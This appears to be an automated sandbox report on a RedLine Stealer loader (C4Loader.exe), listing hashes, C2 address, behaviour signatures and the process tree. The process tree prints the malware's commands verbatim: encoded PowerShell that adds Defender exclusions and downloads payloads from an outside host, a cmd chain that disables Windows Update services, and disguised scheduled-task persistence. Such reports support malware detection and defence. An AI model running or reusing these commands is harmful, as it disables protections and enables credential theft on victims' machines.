Analysis
-
max time kernel
144s -
max time network
112s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
16-08-2022 16:08
Static task
static1
Behavioral task
behavioral1
Sample
C4Loader.exe
Resource
win7-20220812-en
General
-
Target
C4Loader.exe
-
Size
5.4MB
-
MD5
0b9e98abfc3cfa2a2c04902fad9d9016
-
SHA1
bcedd5e456e9a557223fca8448e3039a93fde13d
-
SHA256
48d06d66376def1524df74eda17d52955a7240096f68b02012f8709dec02fa46
-
SHA512
391f868b61868337ba1bbdd2743d5c399cfa509910bf5ce6d86bcb76d990895e31f8c79a40a97eccf0994ad74478024b47d07d6aa1b6a461b1ea7adb5afc2c2a
Malware Config
Extracted
redline
107.182.129.73:21733
-
auth_value
bf3f0909cc45a7db3f5df6f0198db70c
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1088-143-0x0000000002970000-0x0000000002990000-memory.dmp family_redline -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 2044 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 5 IoCs
Processes:
C4Loader.exenew1.exeSysApp.exeC4Update.exefodhelper.exepid process 1324 C4Loader.exe 1088 new1.exe 1448 SysApp.exe 1752 C4Update.exe 840 fodhelper.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
icacls.exetakeown.exepid process 528 icacls.exe 1196 takeown.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 6 IoCs
Processes:
powershell.exepid process 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exetakeown.exepid process 528 icacls.exe 1196 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
C4Loader.exedescription pid process target process PID 288 set thread context of 1452 288 C4Loader.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe conhost.exe File opened for modification C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1756 sc.exe 1076 sc.exe 1360 sc.exe 880 sc.exe 1328 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1208 schtasks.exe 1636 schtasks.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1644 reg.exe 1904 reg.exe 616 reg.exe 1140 reg.exe 1636 reg.exe 1924 reg.exe 1956 reg.exe 1624 reg.exe 1788 reg.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
C4Loader.exepowershell.exenew1.exeSysApp.exepowershell.execonhost.exeC4Loader.exefodhelper.exepid process 288 C4Loader.exe 288 C4Loader.exe 288 C4Loader.exe 288 C4Loader.exe 288 C4Loader.exe 288 C4Loader.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 1088 new1.exe 1088 new1.exe 1088 new1.exe 1088 new1.exe 1088 new1.exe 1448 SysApp.exe 1448 SysApp.exe 1448 SysApp.exe 1448 SysApp.exe 1448 SysApp.exe 1940 powershell.exe 1964 conhost.exe 1324 C4Loader.exe 1088 new1.exe 840 fodhelper.exe 840 fodhelper.exe 840 fodhelper.exe 840 fodhelper.exe 840 fodhelper.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.execonhost.exetakeown.exeC4Loader.exenew1.exedescription pid process Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 1964 conhost.exe Token: SeTakeOwnershipPrivilege 1196 takeown.exe Token: SeDebugPrivilege 1324 C4Loader.exe Token: SeDebugPrivilege 1088 new1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C4Loader.exeInstallUtil.exepowershell.exeC4Update.execonhost.execmd.exedescription pid process target process PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 856 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 288 wrote to memory of 1452 288 C4Loader.exe InstallUtil.exe PID 1452 wrote to memory of 2044 1452 InstallUtil.exe powershell.exe PID 1452 wrote to memory of 2044 1452 InstallUtil.exe powershell.exe PID 1452 wrote to memory of 2044 1452 InstallUtil.exe powershell.exe PID 1452 wrote to memory of 2044 1452 InstallUtil.exe powershell.exe PID 2044 wrote to memory of 1324 2044 powershell.exe C4Loader.exe PID 2044 wrote to memory of 1324 2044 powershell.exe C4Loader.exe PID 2044 wrote to memory of 1324 2044 powershell.exe C4Loader.exe PID 2044 wrote to memory of 1324 2044 powershell.exe C4Loader.exe PID 2044 wrote to memory of 1088 2044 powershell.exe new1.exe PID 2044 wrote to memory of 1088 2044 powershell.exe new1.exe PID 2044 wrote to memory of 1088 2044 powershell.exe new1.exe PID 2044 wrote to memory of 1088 2044 powershell.exe new1.exe PID 2044 wrote to memory of 1448 2044 powershell.exe SysApp.exe PID 2044 wrote to memory of 1448 2044 powershell.exe SysApp.exe PID 2044 wrote to memory of 1448 2044 powershell.exe SysApp.exe PID 2044 wrote to memory of 1448 2044 powershell.exe SysApp.exe PID 2044 wrote to memory of 1752 2044 powershell.exe C4Update.exe PID 2044 wrote to memory of 1752 2044 powershell.exe C4Update.exe PID 2044 wrote to memory of 1752 2044 powershell.exe C4Update.exe PID 2044 wrote to memory of 1752 2044 powershell.exe C4Update.exe PID 1752 wrote to memory of 1964 1752 C4Update.exe conhost.exe PID 1752 wrote to memory of 1964 1752 C4Update.exe conhost.exe PID 1752 wrote to memory of 1964 1752 C4Update.exe conhost.exe PID 1752 wrote to memory of 1964 1752 C4Update.exe conhost.exe PID 1964 wrote to memory of 1940 1964 conhost.exe powershell.exe PID 1964 wrote to memory of 1940 1964 conhost.exe powershell.exe PID 1964 wrote to memory of 1940 1964 conhost.exe powershell.exe PID 1964 wrote to memory of 1480 1964 conhost.exe cmd.exe PID 1964 wrote to memory of 1480 1964 conhost.exe cmd.exe PID 1964 wrote to memory of 1480 1964 conhost.exe cmd.exe PID 1480 wrote to memory of 1360 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1360 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1360 1480 cmd.exe sc.exe PID 1480 wrote to memory of 880 1480 cmd.exe sc.exe PID 1480 wrote to memory of 880 1480 cmd.exe sc.exe PID 1480 wrote to memory of 880 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1076 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1076 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1076 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1756 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1756 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1756 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1328 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1328 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1328 1480 cmd.exe sc.exe PID 1480 wrote to memory of 1956 1480 cmd.exe reg.exe PID 1480 wrote to memory of 1956 1480 cmd.exe reg.exe PID 1480 wrote to memory of 1956 1480 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵PID:856
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZwBiACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZAB2AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBhAGYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB2AHkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAeABxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGYAcQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBkAHQAcgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAxAC4AZQB4AGUAJwAsACAAPAAjAHUAYwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB6AHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbAByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMQAuAGUAeABlACcAKQApADwAIwBmAGEAZAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBuAHoAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAaQBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGYAdQByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHkAeQBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABVAHAAZABhAHQAZQAuAGUAeABlACcALAAgADwAIwB2AHkAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AZQB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAegB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABVAHAAZABhAHQAZQAuAGUAeABlACcAKQApADwAIwBzAGQAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHYAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwB5AGUAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHoAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcAByAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMQAuAGUAeABlACcAKQA8ACMAdgB5AGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBiAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAawB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB1AHQAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGYAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbgB2AHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBxAGcAeAAjAD4A"3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\new1.exe"C:\Users\Admin\AppData\Local\Temp\new1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1448 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"5⤵
- Creates scheduled task(s)
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\C4Update.exe"C:\Users\Admin\AppData\Local\Temp\C4Update.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\C4Update.exe"5⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbwB0AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAagBvAHUAIwA+AA=="6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1644 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1624 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1788 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵PID:1396
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
PID:1904 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵PID:1292
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵PID:1360
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵PID:880
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵PID:1452
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵PID:1328
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵PID:288
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdaterScanMachine" /tr "\"C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe\""6⤵PID:840
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdaterScanMachine" /tr "\"C:\Program Files\WindowsTasks\Defender\DefenderUpdater.exe\""7⤵
- Creates scheduled task(s)
PID:1208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdaterScanMachine"6⤵PID:872
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdaterScanMachine"7⤵PID:876
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:880
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
PID:616
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies security service
- Modifies registry key
PID:1140
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
PID:1636
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
PID:1924
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
PID:1956
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:1328
-
C:\Windows\system32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:1756
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:1076
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:1360
-
C:\Windows\system32\taskeng.exetaskeng.exe {346F0608-4D0F-4D0D-B1B3-B7142543406C} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:936
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:840
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD543a0526a928f9daca9c953221406af8e
SHA134fdd0d94ecfe8c887ebb164068579013d2c611b
SHA25688e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
SHA5129632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd
-
Filesize
2.7MB
MD543a0526a928f9daca9c953221406af8e
SHA134fdd0d94ecfe8c887ebb164068579013d2c611b
SHA25688e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
SHA5129632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd
-
Filesize
7.4MB
MD5d5161722ad6b1c8e92214f444766cf36
SHA13fb04eb73417c8f43e6f9870e4d3f7d4f5cd0178
SHA25658bfe2cebc786e38b71176fa64986cbae3080ce49f2e6d97f79233404c0f3028
SHA5121728b3525f2c1c6a99c1b0e83b3433acccec0322f29bf670bc0b3011f1c81c82e808a24fd1580a56a68155856dd30b453a119afe6a6eb8e38e5bc12198b11a4a
-
Filesize
7.4MB
MD5d5161722ad6b1c8e92214f444766cf36
SHA13fb04eb73417c8f43e6f9870e4d3f7d4f5cd0178
SHA25658bfe2cebc786e38b71176fa64986cbae3080ce49f2e6d97f79233404c0f3028
SHA5121728b3525f2c1c6a99c1b0e83b3433acccec0322f29bf670bc0b3011f1c81c82e808a24fd1580a56a68155856dd30b453a119afe6a6eb8e38e5bc12198b11a4a
-
Filesize
1.5MB
MD54d983d3bf57a1dd138034f68ae61c013
SHA115c18965b9b20f940552776e2998ae969b6c0514
SHA2567a4fb7716f5226a48b13e1d66c4318dc76e2368e81fd359f1a9961486bebb58d
SHA512fe80805531c19d9726a9f7bb329bf20595e986dafe3bfd2ed0407e80bfa0526e2a7cb6908f64da53071d7b29f97d2567fe272b421afa57c859db9c752abc0b36
-
Filesize
1.5MB
MD54d983d3bf57a1dd138034f68ae61c013
SHA115c18965b9b20f940552776e2998ae969b6c0514
SHA2567a4fb7716f5226a48b13e1d66c4318dc76e2368e81fd359f1a9961486bebb58d
SHA512fe80805531c19d9726a9f7bb329bf20595e986dafe3bfd2ed0407e80bfa0526e2a7cb6908f64da53071d7b29f97d2567fe272b421afa57c859db9c752abc0b36
-
Filesize
1.4MB
MD5ecda9264fc1d959ffe35dc9accdd435a
SHA172d7caf672d8b7ef901df21cee98b05a3290ac72
SHA25643590720dd2ae12f9fd462c5b4ef008a7e4795d12262e7d8f39006315c785321
SHA5124a6cb551db4d3f9f1ec334914d025f931a3b672e498bae72c18a7ed9aa83043e21bad7b0949f5fe8ad184b098be7fd5addcd5fb2fdbbfc535d5be2ac0164411e
-
Filesize
1.5MB
MD54d983d3bf57a1dd138034f68ae61c013
SHA115c18965b9b20f940552776e2998ae969b6c0514
SHA2567a4fb7716f5226a48b13e1d66c4318dc76e2368e81fd359f1a9961486bebb58d
SHA512fe80805531c19d9726a9f7bb329bf20595e986dafe3bfd2ed0407e80bfa0526e2a7cb6908f64da53071d7b29f97d2567fe272b421afa57c859db9c752abc0b36
-
Filesize
1.5MB
MD54d983d3bf57a1dd138034f68ae61c013
SHA115c18965b9b20f940552776e2998ae969b6c0514
SHA2567a4fb7716f5226a48b13e1d66c4318dc76e2368e81fd359f1a9961486bebb58d
SHA512fe80805531c19d9726a9f7bb329bf20595e986dafe3bfd2ed0407e80bfa0526e2a7cb6908f64da53071d7b29f97d2567fe272b421afa57c859db9c752abc0b36
-
